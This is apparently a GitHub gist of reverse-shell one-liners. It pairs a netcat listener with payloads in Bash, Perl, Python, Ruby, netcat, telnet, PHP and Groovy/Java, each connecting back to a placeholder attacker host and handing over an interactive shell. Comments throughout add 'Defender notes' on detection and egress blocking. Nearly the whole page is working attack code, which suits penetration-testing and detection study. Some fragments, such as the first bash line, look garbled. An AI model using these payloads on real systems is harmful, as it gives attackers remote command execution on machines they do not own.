Created
November 21, 2019 11:48
Reverse Shell One Liners
# Listener side: netcat listening (-l) on TCP port 4444 (-p), verbose (-v),
# numeric addresses only (-n). The snippets below connect back to this port;
# "attackerip" is a placeholder throughout the page.
nc -nvlp 4444 | |
#Bash | |
# The lines that reference /dev/tcp/<host>/<port> rely on a bash redirection
# feature: bash opens the TCP connection itself, and no such file exists on
# disk. The socket is then attached to a shell's stdin/stdout/stderr, or
# (file descriptor 5 variants) each line read from it is run as a command.
# Defender notes:
#  - File-access monitoring does not see /dev/tcp; look instead for a shell
#    process whose descriptors 0-2 are TCP sockets (/proc/<pid>/fd, lsof).
#  - The string "/dev/tcp/" in a "bash -c" command line or in shell history
#    is a useful hunting term.
#  - Default-deny egress from servers that never need to initiate outbound
#    connections stops every variant in this section.
exec /bin/bash 0&0 2>&0 | |
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 | |
exec 5<>/dev/tcp/attackerip/4444 | |
cat <&5 | while read line; do $line 2>&5 >&5; done # or: | |
while read line 0<&5; do $line 2>&5 >&5; done | |
bash -i >& /dev/tcp/attackerip/4444 0>&1 | |
#Perl | |
# Each one-liner connects to attackerip on TCP 4444 and re-points the perl
# process's standard handles at the socket. The two IO::Socket::INET variants
# attach STDIN and, via $~, what appears to be STDOUT (confirm), then pass
# every line received to system(). The Socket variant duplicates the socket
# onto STDIN/STDOUT/STDERR and execs "/bin/sh -i".
# Defender notes:
#  - The first variant forks and the parent exits, so the connected process
#    is no longer a child of whatever launched it; account for that when
#    reading process trees.
#  - "perl -e" or "perl -MIO" with socket code on the command line, followed
#    by an outbound connection and child processes, is worth alerting on.
//Does not depend on /bin/sh | |
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' | |
//Windows target | |
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' | |
//Could try this one also. (*nix /bin/sh) | |
perl -e 'use Socket;$i="attackerip";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' | |
#Python | |
# Opens a TCP socket to attackerip:4444, duplicates its descriptor onto
# 0, 1 and 2 with os.dup2, then runs "/bin/sh -i" through subprocess.call so
# the shell inherits the socket as its terminal.
# Defender notes: "python -c" importing socket, subprocess and os together,
# or an interactive sh whose parent is python and whose stdio is a socket,
# are both high-signal in EDR/auditd process telemetry.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' | |
#Ruby | |
# The first two variants read one line at a time from the socket (c.gets),
# run it with IO.popen and print the command's output back to the socket.
# The first also calls fork and exits in the parent, detaching the connected
# process from its launcher. The last variant takes the socket's descriptor
# number and execs "/bin/sh -i" with stdin/stdout/stderr redirected to it.
# Defender notes: "ruby -rsocket -e" on a command line, and short-lived
# children spawned by a ruby process that holds an outbound TCP connection,
# are the observable traces.
//Does not depend on /bin/sh | |
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' | |
//Windows Target | |
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' | |
//*nix /bin/sh | |
ruby -rsocket -e'f=TCPSocket.open("attackerip",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' | |
#Netcat | |
# The -e option (run a program with its stdio on the connection) is not
# present in every netcat build; the OpenBSD variant omits it. The last line
# instead creates a named pipe at /tmp/p with mknod.
# Defender notes:
#  - Servers rarely need netcat installed; where it is needed, prefer a build
#    without -e.
#  - A FIFO appearing in /tmp (mknod ... p) next to an outbound nc connection
#    is a host artefact worth collecting during triage.
nc attackerip 4444 -e /bin/sh | |
/bin/sh | nc attackerip 4444 | |
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p | |
#Telnet | |
# Same named-pipe approach as the netcat section, with telnet as the client.
# The second form uses two connections: one to port 4444 feeding /bin/bash,
# and bash's output piped into a second connection to port 4445.
# Defender notes: a telnet client on a server host making outbound
# connections, especially two in parallel to the same address, is unusual
# enough to alert on; removing the telnet client removes the option.
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p | |
Or: | |
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 | |
# Set up a listener on the attacker machine on port 4445/tcp | |
#PHP | |
# Opens a socket with fsockopen (the address 10.0.0.1 and port 1234 are the
# sample values used here, unlike the rest of the page) and then calls exec
# on "/bin/sh -i" with descriptor 3 as its stdin/stdout/stderr.
# Defender notes: where PHP only serves web requests, listing exec and
# fsockopen in php.ini's disable_functions blocks this form; an sh process
# whose parent is php (or the web server worker) should always be alerted on.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' | |
# This code assumes that the TCP connection uses file descriptor 3. | |
# If it doesn’t work, try 4, 5, 6… | |
#Java | |
// Runs "/bin/bash -c" from inside a JVM via Runtime.exec; the bash command is
// the same /dev/tcp read-and-execute loop shown in the Bash section, here
// against port 80 with ATTACKING-IP as a placeholder. The "as String[]" cast
// is Groovy syntax rather than Java, so this is a script-engine snippet.
// Defender notes: a JVM process spawning /bin/bash is rarely legitimate for
// an application server; alert on that parent/child pair and restrict who
// can submit scripts to any embedded script engine.
r = Runtime.getRuntime() | |
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) | |
p.waitFor() | |
by ub3rsec |